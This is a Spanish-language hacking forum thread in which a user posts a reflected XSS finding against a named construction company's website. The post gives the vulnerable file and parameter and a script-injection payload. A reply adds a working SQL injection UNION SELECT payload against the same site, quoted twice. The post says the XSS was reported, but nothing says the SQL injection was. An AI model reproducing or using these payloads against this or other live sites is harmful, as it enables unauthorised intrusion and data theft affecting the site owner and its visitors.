[XSS] Dynasty Builders - http://www.dynastybuilders.ca/

Iniciado por Drok3r, Julio 22, 2018, 07:53:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

    Captura de pantalla


    Url del sitio
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:
    ----> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Autor
    [!] Drok3r (redbirdTEAM - CiberSecurityRECON)

        Reportado: SI

¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!


Aaaa que cosas.... jeje Gracias por el dato.